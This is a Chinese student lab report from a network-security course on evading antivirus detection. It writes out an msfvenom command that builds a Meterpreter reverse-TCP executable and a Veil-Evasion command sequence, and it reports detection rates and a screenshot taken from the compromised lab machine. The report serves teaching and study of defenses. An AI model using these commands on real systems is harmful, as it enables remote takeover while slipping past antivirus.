zoukankan      html  css  js  c++  java
  • 20145303 刘俊谦 《网络攻防》 免杀原理与实践

    20145303 刘俊谦 《网络攻防》 免杀原理与实践

    基础问题回答

    1.杀软是如何检测出恶意代码的?
    (1)基于特征码的检测
    (2)启发式恶意软件检测
    (3)基于行为的恶意软件检测
    2.免杀是做什么?
    免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),翻译为“反杀毒技术”。使恶意代码不被系统发现而被发现的一种技术。
    3.免杀的基本方法有哪些?
    (1)加冷门壳
    (2)加壳改壳
    (3)加花指令
    (4)改程序入口点
    (5)修改内存特征码

    实践总结与体会

    有了杀毒软件才有的免杀,而且两者一直在互相处于对方的对立面。对于加壳和修改特征码等免杀手段来说来说,如果出现新的一种,杀毒软件是无效的,但之后如果杀毒软件反应快的话,很快这种免杀手段就会无效。所以我们还是不能完全信赖于杀毒软件,一方面加强自己的反病毒意识,一方面也不要把重要信息暴露于电脑上。

    实践过程记录

    msfvenom直接生成meterpreter可执行文件

    Windows与Kali的IP地址如下图:

    使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.106 PORT=5333 -f exe > test.exe生成meterpreter可执行文件

    用ncat将文件传输到windows,检测:

    Msfvenom使用编码器生成meterpreter可执行文件

    编码一次,生成可执行文件

    用ncat将文件传输到windows,并检测:

    没什么效果

    编码十次,生成可执行文件

    用ncat将文件传输到windows,再检测:

    我们可以看到,查杀出的概率反而更高了,所以编码这种方法大多数情况下并没有什么效果

    Veil-Evasion生成可执行文件

    直接输入veil-evasion打开软件

    在menu里面输入以下命令来生成可执行文件:

    use python/meterpreter/rev_tcp set LHOST 192.168.1.111 generate 5303test 1

    成功后如下:

    检测:

    可以看到,效果还是不错的

    C语言调用Shellcode

    生成一个c语言格式的Shellcode数组:

    然后用这个数组来编写程序,由于自己电脑上没相应程序,所以用其他同学电脑上编写再拷回来

    监听后才打开的程序,在检测的时候弹出来360的警告

    下图是检测结果

    可以看到,15%的概率比最初少很多,效果很好!

    电脑实测

    kail开启监听,及结果:

    成功获得对方屏幕截图:

  • 相关阅读:
    设置Sysctl.conf用以提高Linux的性能(最完整的sysctl.conf优化方案)
    XSS攻击及防御
    通过Nginx,Tomcat访问日志(access log)记录请求耗时
    nginx配置长连接
    nginx常见内部参数,错误总结
    nginx 并发数问题思考:worker_connections,worker_processes与 max clients
    Nginx与Tomcat、Client之间请求的长连接配置不一致问题解决[转]
    JavaScript的基准测试-不服跑个分?
    延迟求值-如何让Lo-Dash再提速x100?
    如果把编程语言当成座驾
  • 原文地址:https://www.cnblogs.com/ljq007/p/6623665.html
Copyright © 2011-2022 走看看